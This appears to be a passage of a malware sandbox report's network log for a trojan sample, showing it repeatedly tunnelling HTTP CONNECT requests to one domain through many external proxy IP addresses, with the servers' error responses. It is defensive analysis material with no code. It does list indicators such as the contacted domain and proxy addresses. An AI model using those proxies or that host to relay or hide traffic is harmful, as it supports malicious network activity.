                                                                                Feb 23, 2024 14:28:26.528887987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.616149902 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                645192.168.2.852131167.172.158.5580005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.529704094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882483959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.977973938 CET32INHTTP/1.0 504 Gateway Timeout


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                646192.168.2.850634101.255.167.25380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.536621094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.501163960 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                647192.168.2.850727201.77.108.19995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.540435076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.679294109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                648192.168.2.852177104.25.114.28805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.554620028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.643136978 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                649192.168.2.850661103.141.247.680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.555778027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.561443090 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                650192.168.2.85169854.38.179.16237745828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.556092024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.679294109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679701090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.695188999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.788549900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.788440943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.897866011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                651192.168.2.852184172.64.80.55805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.556099892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.644279003 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                652192.168.2.85138967.201.59.7041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.556310892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                653192.168.2.852154104.19.138.4805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.557344913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.645098925 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                654192.168.2.850776164.132.112.254312595828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.557516098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.679327011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679873943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.695198059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.788691044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.788458109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.897867918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                655192.168.2.852011221.230.7.3990005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.558670044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                656192.168.2.852192104.16.108.234805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.558672905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.646148920 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                657192.168.2.85205784.39.112.14431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.558976889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.736855030 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.2
                                                                                Date: Fri, 23 Feb 2024 13:27:46 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                658192.168.2.852194104.21.85.109805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.559323072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.647228003 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                659192.168.2.8522021.0.0.4805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.563690901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.651725054 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                660192.168.2.852146162.241.46.6615795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.563694954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.882436037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.392995119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.124759912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.491911888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.882500887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.288683891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.046786070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.398360014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                661192.168.2.852209104.24.136.68805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.565391064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.652834892 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                662192.168.2.85079345.159.189.24431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.566994905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                663192.168.2.851715200.10.150.115805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.580879927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.679322004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679701090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.695226908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:50.788578987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:02.788460970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.897866964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                664192.168.2.85171145.11.95.16552145828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.592392921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.810118914 CET228INHTTP/1.0 502 Bad Gateway
                                                                                Connection: close
                                                                                Content-type: text/html; charset=utf-8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                665192.168.2.852076196.20.125.13380835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.593372107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.206630945 CET339INHTTP/1.1 400 Bad Request
                                                                                via: 1.1 HermesBypass
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
